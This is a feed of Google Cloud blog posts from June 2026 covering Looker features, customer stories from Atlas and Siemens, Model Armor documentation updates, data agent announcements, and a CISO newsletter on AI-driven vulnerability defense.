In the coming months, we will formally open-source the technical specifications, design principles, and visual assets of Brazos through industry forums. As part of a broader infrastructure portfolio that continues to leverage waterless air-cooled systems alongside liquid cooling, Brazos represents one of many innovations we are contributing to the open hardware ecosystem. We invite system architects, manufacturers, and thermal engineers to evaluate these designs to scale rack-mounted cooling infrastructure for the high-power computing demands of the future.

Next steps

To optimize your legacy data center infrastructure for liquid cooling, follow our upcoming open-source design submissions through the Open Compute Project forum.

Introducing new Explores and Merge Queries in Looker

Tue, 16 Jun 2026 16:00:00 +0000

A key goal for many enterprises in the AI era is to empower their employees to uncover actionable data insights on their own. To help, we are evolving Looker Explore with a streamlined interface and integrated AI, so every usey can confidently turn data into a clear path to action.

A team of AI assistants

At the heart of the new Explore release is a suite of AI capabilities that guides users from their very first click with new insight and expression assistants.

AI-assisted Quick Start

We are virtually eliminating the cold start from an empty canvas. If the data modeler hasn't built predefined Quick Starts, Looker automatically generates a query for the user, tapping into Google’s latest Gemini models to generate ad hoc Quick Starts that can help users dive deep into the data, beyond visible fields, and surface potential questions the data can tackle.

The new Explore interface in Looker

Insight Assistant

Users can now prompt Looker Explores in natural language to modify data tables and visualizations. The Insight Assistant uses the Conversational Analytics API to identify relevant fields, apply filters, sort data, and construct the data table. We expect this feature to be a significant time-saver that can provide a rapid starting point for complex analysis.

You can ask questions in natural language to update data tables in Looker

Expression Assistant

Users can also use natural language to describe their custom calculation, and Looker will automatically fill in the appropriate syntax, without having to learn Looker Expression (Lexp) syntax. Users can also re-prompt the assistant to iterate on custom field expressions.

AI-generated Explore summary

If a user-generated description does not exist for an Explore, Looker will provide an AI-generated summary, to help data analysts rapidly gain familiarity.

An intuitive, modernized UI

In addition to these new assistants, we’ve updated the Looker user interface to be more modern and polished. There, you’ll find:

A customizable workspace: The new interface features a resizable field picker pane, with more easily readable long field names.
Data table contextual menus: Looker now offers powerful functionality right in the data table. Users can access quick menus on columns to switch data granularities, apply filters like 'IS NOT BLANK' or 'IS NOT NULL', and instantly add complex table calculations like '% of column' or 'running total'.
Visual pivots: Users will soon be able to drag and drop fields into a panel to pivot data into columns, rows, and aggregated values.

Connect data with redesigned merge queries

Looker’s new interface to quickly join modeled data

In addition, we redesigned Looker Explore’s Merge Query workflow with a unified, in-window architecture that includes:

A dynamic three-panel interface: The new design maintains context beautifully by displaying three simultaneous panels: a "configure joins" list on the left, a dynamic field picker in the middle, and your data preview/visualization on the right. You can edit a source query without losing the context of the overarching join configuration.
Smart join suggestions: The new panel automatically suggests optimal join fields, such as state and month, and shows the combined fields.
Instant query linking: If you have an existing query you want to use, you can paste a prebuilt query URL to start a join.
Expanded row limits: We've increased the default row limit for non-BigQuery sources to 50,000 rows.

By pairing conversational AI with a dramatically simplified user interface, Looker’s new Explore experience gives your business users the tools they need to investigate their data with confidence. Reach out to your Looker administrator today to enable this feature. For more information, click here for detailed documentation.

How Atlas scales hundreds of merchant databases with Cloud SQL Enterprise Plus edition

Tue, 16 Jun 2026 16:00:00 +0000

Atlas is building the operating system for restaurants. Online storefronts, point of sale, third-party logistics, food platform integrations, customer loyalty, and AI tools represent everything a restaurant needs to start, run, and grow. We work with brands like SaladStop, Killiney, Haidilao, Raffles Hotel, Lo and Behold Group and the Les Amis Group in Singapore, helping merchants increase basket sizes, grow sales, and reduce operational costs.

Every merchant on Atlas gets their own dedicated Cloud SQL for PostgreSQL database. Restaurants are very different from each other. A single-outlet cafe and a multi-outlet chain should not look the same underneath. Isolated databases give us full data separation, predictable performance even during peak lunch and dinner rushes, and the flexibility to scale, tune, or migrate each merchant independently. As Atlas grows, the number of databases grows with us.

The challenge: Scaling beyond standard

We started on the standard Cloud SQL Enterprise edition. It was a solid foundation, but as we onboarded more merchants and shipped more features, the operational layer required to manage our databases became a bottleneck.

We were managing connection pooling as a separate layer, which meant more services to run, secure, and monitor. When a query caused a CPU spike, we needed to know exactly what happened and which merchant triggered it, but we were spending too much time reconstructing problems from limited signals. With a lean team and no dedicated database engineers, every extra component multiplied the maintenance load.

The shift to Enterprise Plus edition

When we needed to provision new database instances, the Google Cloud team introduced us to Cloud SQL Enterprise Plus edition. We were already asking ourselves how much more operational overhead this was going to add, and what stood out was that Enterprise Plus edition removed whole categories of work we would otherwise have to own.

Managed connection pooling: Now built directly into Cloud SQL, we no longer run pooling as a separate layer. This means fewer moving parts, less to maintain, and a smaller security surface area.
Query insights: This was the most impactful feature for our needs. We can now see exactly which queries are expensive and which merchant is triggering them. It turns performance tuning from guesswork into something concrete and actionable. For a platform running hundreds of databases, this visibility is a "superpower."
Data cache: This keeps read performance consistent even as merchant datasets grow. Since restaurants generate more data every day, the data layer needs to stay fast as that complexity compounds.
Near-zero downtime scaling: We can now scale instances as merchants grow without disrupting service during off-peak hours.

After seeing the results on the new instance, we migrated all our existing databases to Enterprise Plus edition as well.

The impact: Focus on innovation, not plumbing

Atlas today powers thousands of restaurant outlets, processes tens of thousands orders daily using hundreds of managed databases. The biggest change is where engineering time goes. We spend 30% less time on database operations and more time building products. Merchant onboarding got simpler because a new merchant is provisioned in seconds with a ready-to-use managed database. We are much more proactive on performance now, catching and fixing issues before they reach merchants. Day to day, we are not thinking about database plumbing. We are thinking about how to serve merchants better and that has allowed Atlas to grow 200% to 300% year over year.

Looking ahead: An AI-first future

We are investing deeply in AI, both internally and externally. Internally, we have gone all in on agentic engineering through AI-assisted development workflows that let a lean team build, review, and ship code significantly faster. Externally, we are building AI-powered tools that help restaurant operators make better decisions and act on them. We have a lot of experimental ideas on the roadmap, including new product surfaces and new ways to help restaurants grow. The thing that gives us confidence to move fast on all of this is that the foundational layer, Cloud SQL and Google Kubernetes Engine (GKE), is battle-tested and does not get in the way.

Google Cloud handles the infrastructure complexity. Atlas stays focused on building the best tools for restaurants.

Cloud SQL Enterprise Plus gave us a database architecture that is flexible, observable, and easy to scale. We are not thinking about infrastructure anymore, we are thinking about our merchants. As we go deeper on AI and continue growing the platform, Google Cloud gives us the confidence to move fast without worrying about what is underneath.

Ready to scale your database architecture?

Don't let infrastructure bottlenecks slow down your innovation. Whether you are managing tens or hundreds of databases, see how Google Cloud SQL can streamline your operations, enhance observability, and give your engineering team the freedom to focus on what matters most.

Explore Cloud SQL Enterprise Plus edition today
Sign up to try Cloud SQL for free.

How Siemens "slices the elephant," advancing agentic workflows for industrial software development

Tue, 16 Jun 2026 14:00:00 +0000

For technology companies like Siemens, software is the nervous system of factories, energy grids, and transportation networks worldwide.

As a global leader in industrial AI, industrial software, and industrial automation, Siemens brings decades of domain expertise across factory and process automation, energy infrastructure, and intelligent transportation — expertise that no off-the-shelf AI solution can replicate. But innovation carries a heavy anchor: legacy code.

With codebases spanning hundreds of millions of lines developed for over more than a decade, Siemens faced a challenge that standard AI tools couldn't solve: understanding and modernizing this code and the applications which run on it. The scale and depth of industrial-grade software demand a fundamentally different approach. Existing coding assistants lacked the contextual depth required to navigate complex, multi-layered industrial codebases — a gap Siemens set out to close.

To solve this, Siemens and Google Cloud created Knowledge Fabric, an AI system for automating the software development lifecycle. It was built using knowledge graphs on Spanner Graph, the Google Agent Development Kit, Gemini API, Agent Platform, Gemini CLI, and Anthropic Claude Code. In a pilot migrating existing frontiers to web-based interfaces, Knowledge Fabric reduced implementation effort, freeing engineers to focus on customer innovations while maintaining full system compatibility.

“By ingesting the entire software ecosystem into an intelligent agentic system equipped with custom knowledge graphs, we aren’t just helping developers optimize their development time; we are enabling autonomous agents to reason across the past to build the future,” said Franz Menzl, senior vice president, product creation excellence at Siemens. “This is about freeing engineers from repetitive work so they can focus on higher-value problem solving.”

The challenge: the complexity industrial software

Modernizing large-scale industrial-grade software systems is often compared to rebuilding a jet while flying it. For Siemens, the challenge had four dimensions:

Scale: The repositories are massive — far exceeding the context windows of standard large language models.
Fragmentation: Critical knowledge was scattered across code, Jira tickets, Confluence pages, and scanned PDF manuals from the early 2000s.
Complexity: Tracing the link between a specific line of code and a functional requirement document from 10 years ago presented a challenge that no manual or conventional tooling approach could address efficiently. It’s a reality shared across the industry.
Responsibility: Systems must adhere to strict quality, compliance, and lifecycle requirements, often over 15 to 20 years of operation. AI‑generated outputs must therefore be explainable, traceable, and verifiable. Hallucinated or unvalidated changes are not merely inefficient but operationally unacceptable.

"We realized that standard RAG (retrieval-augmented generation) wasn't enough," said Agata Gołębiowska, technical lead, Google Cloud. "Code isn't just text; it has inherent structure. A class belongs to a file, which belongs to a module. Flattening that into a vector database meant losing the representation of relationships elements of the codebase."

The solution: A domain-aware Knowledge Fabric

To make this sprawling software environment navigable for AI-driven workflows, the teams built the Knowledge Fabric agent. This agent goes beyond keyword matching to “understand” the relationships between assets.

We use Spanner Graph to model the inherent structure of the codebase, applying the same rigor to documentation across formats. By mapping connections between these domains, we can link specific code snippets directly to requirements in a design document. Agents then traverse this graph, using tools to query the structure via Graph Query Language (GQL).

But GQL is only one piece. To enable semantic understanding, we generate embeddings for every node, using Spanner's Approximate Nearest Neighbors (ANN) algorithm to perform efficient vector search across the full codebase. Finally, we give agents full-text search capabilities, which can be combined with GQL to pinpoint nodes and edges with precision.

Combining these three methods lets an LLM agent answer complex queries, such as: "Which functions need to be updated if I change the logic in the Axis Control Panel?" The system traverses the graph — weighing keyword and semantic similarity — to identify dependencies, retrieve relevant documentation, and present a precise impact analysis.

This precise context is what lets a coding agent produce a valid, usable, and maintainable implementation.

"Slicing the elephant:" the agentic workflow

A key insight from the project was that AI agents struggle with massive, ambiguous tasks. To succeed, the team adopted a design pattern dubbed "slicing the elephant."

The system breaks a sweeping request like “refactor this module” into smaller, more manageable tasks, each handled by a specialized agent built with the Google Agent Development Kit (ADK):

Search agent: Acts as a deep-research specialist. It uses tools to explore the code graph and cross-reference findings with documentation in Agent Search.
User story agent: Interviews the product owner to gather requirements, then drafts detailed user stories with acceptance criteria linked to existing system contexts.
Architecture impact agent: Analyzes proposed changes against the graph to predict side effects before a single line of code is written.
Task breakdown agent: Consumes the analysis from the architecture impact agent and breaks the work into small, manageable tasks, each carrying all the context relevant to a specific change.
Coding agent: Implements the change described in a specific task. Reaching this step without context and prior analysis produces unusable code.

The system keeps a human in the loop at every step, which ensures reliable, production‑grade outcomes and keeps engineers focused on meaningful work rather than routine implementation.

"By slicing the elephant — breaking complex refactoring jobs into smaller, agent-led tasks — we observed a significant productivity increase," said Alexander Lomakin, project lead at Siemens. "We essentially gave the AI the roadmap it needed to navigate the complexity."

Pilot results: Faster, more efficient engineering

Developers saw results almost immediately.

Analyzing dependencies for a new feature once required senior engineers to spend several days navigating codebases and legacy documentation. With the Knowledge Fabric, the same work now takes far less time.

In a recent production pilot migrating legacy control panels to modern web‑based interfaces, the Knowledge Fabric reduced overall coding effort while preserving system integrity and industrial quality standards.

Engineers now spend more time creating customer value and less on repetitive work.

Get started

The Knowledge Fabric shows that generative AI can do more than write boilerplate code, it can also help teams modernize the legacy systems their businesses depend on most.

To learn more about building graph-based agents for your own legacy modernization:

Read about Spanner Graph.
Explore Agent Platform and find pre-built production-grade agents on Agent Garden
Check out the Agent Development Kit.
Read more on how Siemens is advancing industrial AI.

How customer collaboration is shaping the future of GenAI security with Model Armor

Tue, 16 Jun 2026 07:00:00 +0000

At Google Cloud, we believe that the best products are built in partnership with our customers. Their feedback and real-world experiences are invaluable in helping refine our services and deliver solutions that truly meet our customers’ needs. In January 2026, our Google Cloud Developer Advocacy team participated in a high-velocity technical sprint with a major Google Cloud customer and a leader in the telecommunications industry.

This collaborative engagement provided us with deep insights, leading to significant enhancements in Model Armor information experience, our service for Runtime security for generative and agentic AI.

Accelerating GenAI adoption through "radical empathy"

The objective of this engagement was to support the productionization of a next-generation GenAI customer support platform built using Google Cloud's Agent Development Kit (ADK) and Agent Platform. By sitting directly with the customer's developers and security specialists, we gained a unique opportunity to observe how developers interact with Gemini Enterprise Agent Platform in a live, complex environment.

This experience provided something traditional documentation cycles cannot replicate: radical empathy. By logging friction points, as developers worked, we translated functional blockers into technical insights in real-time, identifying exactly where developers were hindered by ambiguous configuration guidance or a lack of granular detail.

Key discoveries from the front lines

By observing the development workflow firsthand, we identified four critical friction points:

Search-first workflows: Developers rarely navigate through documentation hierarchies; instead, they rely on search to jump straight to specific code examples. A lack of comprehensive, copy-pasteable snippets for common use cases—like PII redaction—was a primary point of friction.
Balancing confidence levels: Finding the right balance between comprehensive threat detection and minimizing disruptive false positives proved challenging. For instance, using aggressive settings like "low and above" often caused a high volume of false positives that interrupted legitimate customer support flows.
The need for granular guidance: While the core concepts of Model Armor were understood, developers needed more detail on how different enforcement methods function in practice to balance security with usability.
Integration roadblocks (the 403 error): When integrating Model Armor with other services like Apigee, developers frequently encountered 403 PERMISSION_DENIED errors. This indicated a gap in our documentation regarding necessary cross-service IAM roles and permissions.

Turning insights into action

The insights gained from this partnership were immediately channeled into a comprehensive overhaul of Model Armor’s documentation and guidance:

Tested, copy-pasteable code samples: We have added numerous tested, ready-to-use code samples throughout the documentation to support search-first workflows.
The confidence level matrix: We introduced a new technical reference to help users understand the trade-offs between different filter levels. We now explicitly recommend "High" or "Medium" thresholds for general content to minimize false positives, reserving "Low and above" for high-security threats like prompt injection and jailbreak detection.
Explicit integration guides: We updated our integration guides, with a focus on Apigee, Gemini Enterprise Agent Platform, and GKE. These now clearly outline the specific IAM roles required (such as roles/modelarmor.user) to ensure smooth, error-free deployments.
Deeper technical documentation: We have enhanced the documentation to provide in-depth explanations of enforcement methods and their real-world applications.

The power of partnership

Getting "in the room" with our customers allowed us to bridge the gap between technical accuracy and operational utility. This journey of co-innovation ensures that Model Armor serves as a genuine catalyst for your success. We encourage you to explore the updated documentation and share your feedback as we continue to build the most secure platform for your GenAI workloads.

Get started:

Explore the updated Model Armor documentation

What’s new in data agents: Supercharging your AI workflows

Mon, 15 Jun 2026 17:00:00 +0000

The rise of AI agents is fundamentally disrupting applications and analytical systems. Generic AI platforms don't usually have access to the context stored within enterprise databases. This is because traditional data architectures often lack context for agents across the data estate, which can lead to agents being inaccurate. They’re also prone to security gaps due to a lack of granular access controls.

Google’s Agentic Data Cloud is an AI-native system of action that includes both operational and analytical systems. By infusing AI across the entire stack — from custom silicon to frontier Gemini models — we provide a deterministic, template-driven developer framework that allows agents to ground their reasoning in real-time enterprise data with near-100% accuracy, as well as unified governance.

Today, we’re making it easier to develop agents, with a whole host of new data agents and tools: for business analysts within Conversational Analytics; for data scientists, engineers, and database admins with a series of Google-built Data Agents that provide greater automation and intelligence; and finally, for developers, with Data Agent tools that help you better integrate with today’s open agentic ecosystem.

1. Conversational Analytics

To support developers building agents using natural language, we’re announcing expanded support for Conversational Analytics across Data Cloud.

Conversational Analytics in BigQuery, in preview, integrates a sophisticated AI reasoning engine directly into BigQuery Studio, helping data and business teams go beyond writing manual SQL, leveraging business context to ground answers using multimodal synthesis and deep-dive research. Agentic workflows, in preview for select customers, automate root-cause analysis, and schedule actions — turning enterprise data into proactive, actionable intelligence.

Create agents for faster data insights with Conversational Analytics in BigQuery

Conversational Analytics in Lakehouse, now in preview, extends the Lakehouse unified infrastructure, so users can query distributed data lakes across AWS, Azure, and Google Cloud using natural language. This makes it possible to combine insights across cloud platforms without moving a single byte of data.

Conversational Analytics in AlloyDB, Spanner, and Cloud SQL, now in preview, supports out-of-the-box conversational AI, making data accessible for everyone. AlloyDB, Spanner, and Cloud SQL users can start natural-language conversations with their databases to gain visibility into their real-time operational data and capture analytical insights.

Use Conversational Analytics to get answers from your operational data

Looker Embedded Conversational Analytics, now generally available, allows you to embed agents directly into your custom applications and internal workflows via a low-code iframe implementation, making it easier to ship production-ready, conversational AI within any application. Additionally, with the Conversational Analytics API in Looker, you can create multi-turn conversational workflows that offer AI-powered recommendations, while also verifying and explaining the underlying SQL query. We are also significantly upgrading Looker’s core Conversational Analytics agent, which is already GA, with superior reasoning and semantic grounding, helping to eliminate ambiguity.

Embed agents directly into your applications for conversational AI

2. New data agents

To help data professionals move from reactive data management to proactive intelligence, and business analysts better interact with their dashboards, we’re announcing a new set of data agents that bring automation, intelligence, and natural language capabilities into their daily workflows.

Data Engineering Agent, now generally available, automates the heavy lifting of building and maintaining data pipelines. It transforms natural language requirements into optimized SQL or Python code for BigQuery and Dataflow, while proactively identifying and fixing pipeline breaks. By suggesting schema improvements and partitioning strategies, it ensures your data foundation is scalable, reliable, and performance-tuned without manual trial and error.

Data Science Agent, now in preview, accelerates the path from raw data to production-ready models. It assists data scientists by suggesting relevant features, generating boilerplate notebook code, and automating the technical documentation process.

Database Observability Agent, in preview with select Cloud SQL, AlloyDB, Spanner, and Bigtable customers, proactively monitors database performance and continuously identifies potential issues before they escalate. It then delivers intelligent recommendations and multi-turn remediation workflows for fast, comprehensive troubleshooting and optimization. It provides performance analytics for the entire database fleet, helping you quickly identify performance optimization opportunities across databases.
Database Onboarding Agent, in preview with select customers, takes the guesswork out of database selection and deployment. By evaluating your stated requirements — from simple use case descriptions, to complex enterprise needs — it recommends the best Google Cloud database and guides you through provisioning.
Looker Dashboard Agent, now in preview, enables conversational interaction with data within dashboards. Users can ask natural language questions and receive context-aware answers within the dashboard. This feature also provides AI-generated summaries that highlight key takeaways and insights from the dashboard.
Conversational Analytics in Gemini Enterprise, now in preview for Looker, BigQuery, and Lakehouse, brings governed intelligence built by data practitioners directly to business leaders. It serves as a "front door" to the Google Data Cloud, allowing business users to consume agents built in BigQuery, Looker, or Lakehouse without needing to access technical consoles. By publishing these agents from Google Data to Gemini Enterprise, organizations provide a single, grounded interface for precision data exploration and immediate answers to the business users.
Data Insights Agent, now in preview, provides unified insights into your data assets in Gemini Enterprise, by simultaneously querying structured sources like BigQuery and Snowflake alongside unstructured data like meeting notes and public web info. It functions as a quick-response engine for everyday business users, synthesizing information across the Workspace ecosystem (Docs, Sheets, Drive) and third-party apps like Jira and HubSpot. The agent features rich, interactive visualizations and learns continuously to align with user preferences over time.

Deep Research Agent, now in preview, uses the Knowledge Catalog to solve high-stakes, multi-layered business problems. It moves beyond simple search to build comprehensive research plans that synthesize intelligence from internal documents, BigQuery tables, and the public web. The result is a detailed report with dynamic visualizations and verifiable citations, that respect enterprise privacy and user permissions all the while.

3. Tools for data agents

Open-source standards for agentic development provide developers building AI applications and custom agents with a unified framework to access data and tools consistently and securely. Today, we are announcing the following tools to help ground your agentic development initiatives:

Data Agent Kit: now in preview, provides a standardized suite of skills and tools directly within preferred developer environments (IDE/CLI), empowering data practitioners to discover, transform, and action data at scale using the prescriptive guidance from the Agentic Data Cloud capabilities.
Managed MCP Servers for Databases, now generally available for AlloyDB, Spanner, Cloud SQL, Bigtable, and Firestore, fully manages the infrastructure required to connect AI models securely to your data, so you don’t have to host, secure, or scale MCP servers yourself. Now, developers can provide their agents with up-to-date context from across our database portfolio, so that your AI models can reason and act upon your most up-to-date enterprise data.
Managed MCP Server for Looker, now in preview, allows any MCP client or agent platform to query Looker's semantic models, extending governed BI insights across third-party applications.

Access Looker semantic models through Managed MCP Server

MCP Toolbox for Databases 1.0, now generally available, has achieved a major stability milestone, giving you the confidence to build production applications. We also overhauled the documentation, making the platform significantly more approachable for both human developers and autonomous agents.
QueryData for Cloud SQL, AlloyDB, and Spanner, now in preview, turns natural language questions into database queries. It’s built natively into these databases, and provides near-100% accuracy for natural language to SQL conversions through metadata, query examples, and evals.
Universal Commerce Protocol (UCP) Analytics powered by BigQuery, now in preview, enables merchants and developers to stream real-time events from UCP directly into BigQuery (see sample). This integration provides out-of-the-box observability for agentic commerce, allowing teams to monitor conversion funnels, track automated checkout performance, and identify system errors. By standardizing these metrics within BigQuery, businesses can bridge the gap between AI-driven transactions and existing business intelligence workflows.

Details on how to access the new agents and tools can be found from each of the documentation links on this page. Data agents are also available through Gemini Enterprise and the Google Cloud console.

Cloud CISO Perspectives: The 4 lessons that guided AI Threat Defense

Mon, 15 Jun 2026 16:00:00 +0000

Welcome to the first Cloud CISO Perspectives for June 2026. Today, we introduce Chris Betz as the new CISO of Google Cloud. For his first Cloud CISO Perspectives, Chris shares four key lessons we learned about using AI to the defender’s advantage while building AI Threat Defense.

As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the Google Cloud blog. If you’re reading this on the website and you’d like to receive the email version, you can subscribe here.

aside_block: <ListValue: [StructValue([('title', 'Get vital board insights with Google Cloud'), ('body', <wagtail.rich_text.RichText object at 0x7f1ee28c7250>), ('btn_text', 'Visit the hub'), ('href', 'https://cloud.google.com/solutions/security/board-of-directors?utm_source=cgc-site&utm_medium=et&utm_campaign=FY26-Q2-GLOBAL-GCP39634-email-dl-dgcsm-CISOP-NL-177159&utm_content=-&utm_term=-'), ('image', <GAEImage: GCAT-replacement-logo-A>)])]>

Cloud CISO Perspectives: The 4 lessons that guided AI Threat Defense

By Chris Betz, CISO, Google Cloud

Chris Betz, CISO, Google Cloud

Just a year ago, it would take months or even years for a good application security team to find thousands of vulnerabilities. Today, a team equipped with multiple AI models can find the same number in hours — or even minutes.

AI is rewriting the rules of cybersecurity. It’s true that AI has boosted adversaries, introducing new threat actors, techniques, and surfaces to defend against, all operating with unprecedented scale, speed, and sophistication. AI-powered attackers are developing zero-day exploits by analyzing more than just source code: Configuration vulnerabilities, binaries, and firmware are all in their crosshairs.

However, AI has also created a significant advantage for defenders. Not only are these same capabilities in our hands, adding to our defense, but we have the added advantage of the full business context that adversaries lack. Software security, and especially vulnerability finding and fixing, is being revolutionized.

Security is changing rapidly, demanding that we all innovate in response. Here is how we are approaching this work today, and some of the lessons we learned along the way.

It’s clear that the AI benefits for security are rapidly evolving, and we can no longer rely on legacy, manual defenses. The new imperative for CISOs and business leaders is to transform vulnerability management by combating machine-speed threats with a defensive strategy that’s AI native, agentic, and open.

We’ve been preparing for this moment for years: From Project Naptime, an internal project to automate vulnerability hunting (so security researchers can take regular naps), to Big Sleep, our autonomous zero-day hunter, to CodeMender, our automated AI-patching agent, we’ve innovated to advance using AI to improve security for all.

Across our products and services, we’ve found that a unified approach helps us protect Google at Google scale. Based on this approach, we recently introduced AI Threat Defense as a pathway to achieve the threat-readiness transformation that you need to defend against AI threats with AI.

The framework is straightforward, and you’ll find that it’s ultimately about two key points:

Using rapidly-advancing AI to protect ourselves.
Shifting the way we develop from the ground up.

Security is changing rapidly, demanding that we all innovate in response. Here is how we are approaching this work today, and some of the lessons we learned along the way.

Four key lessons

Our work is built on a four-step framework, structured directly on what we learned:

Prepare: How Google started the journey — hardening our foundation and operationalizing the framework.
Scan and prioritize: How we identified vulnerabilities — conduct deep-dive analysis and posture validation.
Remediate: What we learned from remediation — implement workflows to autonomously verify and patch vulnerabilities quickly.
Monitor: How we evolved monitoring with AI agents — transition to continuous detection and active response playbooks.

1. Prepare: A modern enterprise runs on an enormous amount of software, and at Google that amount is even greater. We needed focus in order to move at speed, so our first lesson was to reduce our attack surface. That let us narrow our focus, reduce complexity, and use insights we have on our software supply chain and dependencies to prioritize and protect our external interfaces.

Second, we invested in the operational framework supporting the vulnerability work. Early experimentation quickly showed us how valuable a scaling framework is that applies our knowledge of the environment, protects and allocates resources for scanning, and allows new capabilities to be iterated on and used by multiple teams. The amplifying power of good information, code access, dependency graphs, token budgets, and infrastructure are key friction reducers.

Third, we planned engineering work alongside security work: Your engineering partners are critical, especially for aligning with your resiliency and deployment processes.

Key lessons include:

Tagging components with the model, harness, and issues found when scanning.
Allocating hardware and token budgets for finding, developing fixes, build and test.
Managing change volume (and engineer hours) while simultaneously focusing on more, smaller updates, where possible, with good rollout plans to de-risk the change.

2. Scan and prioritize: We continuously scan our code across products — Search, Ads, Android, Chrome, and Google Cloud — managing tens of thousands of packages.

First, we kicked off scanning and centrally tracked our progress, integrating the same tools into our pipelines. We learned early on that the best scanning results come from a combination of an expert in the specific product plus the harness plus the AI model. The combination is crucial, because results will be markedly different without all three.

It’s worth noting that if you can only pick two, we recommend expertise and harness. A less capable model with a good harness and good expert is more powerful than the best model without a good harness or good experts. We also advise using more than one model.

It’s important to track and iterate the data. Since the technology is evolving fast, your data is critical to revise and refine your processes.

Second, look carefully at your software supply chain, and engage your key suppliers. Reachability remains a key criteria for fixes, as does streamlining and simplifying the areas you work on.

Third, because there are so many vulnerabilities that can show up, it’s important to have the right methodology to prioritize them. Normally, when you’re rolling out a change you prioritize the smallest blast radius to make incremental change. Here, we recommend flipping that model: Begin with foundational code with the biggest blast radius to tackle the hardest problems first.

AI models can do a good job of developing proof-of-concepts to rapidly test accuracy. Harness and models play a significant role in reducing false positive rate. Adapting your harness to do validation and using a different agent or model to validate results are both very valuable.

Another key to AI-powered triage is to use your harness and tools to state vulnerability confidence as well as severity. Of course, developing a patch is only part of the problem.

3. Remediate: Fixing vulnerabilities at Google scale required a fundamental shift in strategy. We developed a new approach centered on three lessons.

First, how you roll out patches matters. We adopted a risk-based approach that prioritized code reachable from the outside and had the largest blast radius, such as critical applications like BoringSSL and gVisor. We also learned that providing the model with context was the key to faster, more trusted remediation.

Second, we learned you cannot fix what you cannot track. To manage remediation at scale, we built a central system to track every vulnerability, from discovery to resolution, with every finding labeled in a central repository. This single source of truth allowed us to enforce service-level objectives (SLOs) for patching, and enabled us to deploy constant autonomous patching with human review. Coupled with robust roll-back capabilities, our teams got better at fixing things quickly and safely.

Finally, we learned to build resilience directly into the system. The ultimate goal was to create an inherently-resilient system that can also patch vulnerabilities, not the other way around. We don't just fix the code; we harden the entire system around it.

These changes helped us rethink our approach to securing open-source software with a three-R’s strategy: Refresh, remove, and rewrite.

First, we refresh what is foundational — finding and fixing vulnerabilities in the code. This is about being good network citizens and protecting the core.
Second, we remove what is peripheral. We are removing dependencies and replacing them with custom code. This is about both efficiency and reducing the attack surface, moving from a broad base of trust to a narrow, controlled one.
Third, we rewrite what is critical. For everything in between, we are transitioning legacy logic and critical capabilities into modern, memory-safe languages using AI to automate the transition to eliminate entire classes of vulnerabilities from that software.

This evolution is a deliberate approach to reduce complexity, shrinking the attack surface, and building a more resilient, autonomous, and secure-by-design foundation for everything we do.

4. Monitor: Our work doesn’t stop there, and neither should yours. The security landscape is always changing, and the monitor phase is where our approach comes alive by creating a perpetual feedback loop to ensure we stay secure — and get stronger over time.

We had three key lessons in this phase. First, security demands a constant feedback loop. We created a feedback loop to monitor the entire ecosystem for two things: system strain and vulnerability hotspots.

Second, we invested in tracking our long-term remediation health. You can only improve what you measure. We built a comprehensive asset inventory to track our overall security posture and the completeness of our remediation efforts. Here’s where we hold ourselves accountable to product-level SLOs for vulnerability management.

This system allows us to deploy rolling patches that can update even our data center hardware continuously and use AI agents to verify patch efficacy at a scale no human team could manage.

Third, we planned for the future by using AI agents for both coding and monitoring. You have to assume that at some point, the attackers' models will become more advanced. We need to evolve our operating model and build for that reality.

We use AI agents to automate and standardize our response playbooks, enabling instantaneous containment when an issue is found. We move beyond just finding bugs by feeding key libraries into Gemini to improve its pattern recognition, creating security-aware coding agents. Meanwhile, our AI-assisted red teamers are continuously stress-testing our core infrastructure, ensuring our defenses are always evolving.

The outcome of this constant monitoring is a living, measured program that we can trust.

This is how we protect billions of users every day, and it provides a framework that any team can use to build a defense that learns, adapts, and hardens itself against the threats of tomorrow.

To learn more about AI Threat Defense, you can watch our recent Security Talks online event.

aside_block: <ListValue: [StructValue([('title', 'Learn something new'), ('body', <wagtail.rich_text.RichText object at 0x7f1ee28c7670>), ('btn_text', 'Watch now'), ('href', 'https://www.youtube.com/watch?v=blh0hhHJ4pI'), ('image', <GAEImage: Cloud-CISO-Perspectives-logo-A>)])]>

In case you missed it

Here are the latest updates, products, services, and resources from our security teams so far this month:

Detecting and containing AI-powered threats with Google Security Operations agents: Learn how Google Security Operations works in concert with AI Threat Defense to monitor, detect, and respond to threats, particularly from code you do not own or can not patch. Read more.
How to stop AI voice clones from bypassing your security perimeter: The traditional, relatively stable network perimeter has been replaced by one far more malleable: Identity, driven by vishing attacks. Here’s how to defend against them. Read more.
5 lessons from red teaming AI applications: Distilled from Mandiant’s hands-on red team experiences, check out our clear, concise guidance to help customers securely develop and deploy AI apps. Read more.
Introducing Wiz Cloud Cost: Powering cost management and optimization with context: Wiz unifies cloud and AI cost visibility to help teams eliminate waste and improve spend efficiency across their AWS, Azure, and Google Cloud environments. Read more.
Bringing AI agents to Chrome Enterprise security management: We're launching an open-source model context protocol (MCP) server that connects AI agents directly to Chrome Enterprise APIs, helping IT and security teams manage browser security more efficiently. Read more.
How Google Does It: An inside look at cybersecurity: Learn how Google approaches some of today's most pressing security topics, challenges and concerns, straight from Google experts. View the collection.

Please visit the Google Cloud blog for more security stories published this month.

aside_block: <ListValue: [StructValue([('title', 'Join the Google Cloud CISO Community'), ('body', <wagtail.rich_text.RichText object at 0x7f1ee28c71c0>), ('btn_text', 'Learn more'), ('href', 'https://rsvp.withgoogle.com/events/google-cloud-ciso-community-interest-form-2026?utm_source=cgc-blog&utm_medium=blog&utm_campaign=FY25-Q1-global-GCP30328-physicalevent-er-dgcsm-parent-CISO-community-2025&utm_content=cisop_&utm_term=-'), ('image', <GAEImage: GCAT-replacement-logo-A>)])]>

Threat Intelligence news

Seeking counsel: Ongoing targeted campaign against U.S. law firms: Mandiant Consulting details a financially-motivated data theft extortion campaign executed by the threat cluster UNC3753, highlighting tactics like physical office targeting, and provides actionable recommendations to safeguard endpoints and infrastructure. Read more.
Welcome to BlackFile: Inside a vishing extortion operation: Google Threat Intelligence Group (GTIG) has continued to track an expansive extortion campaign by UNC6671, a threat actor operating under the "BlackFile" brand, that targets organizations via sophisticated voice phishing (vishing) and single sign-on (SSO) compromise. Read more.
2 PhaaS 2 Furious: The evolution of Chinese-language phishing services: While Russian-speaking threat actors have historically dominated the phishing-as-a-service (PhaaS) landscape, a rival ecosystem is rapidly growing within the Chinese-language underground. Within this ecosystem, GTIG has observed a fundamental move away from static password harvesting towards real-time interception and tokenization. Read more.

Please visit the Google Cloud blog for more threat intelligence stories published this month.

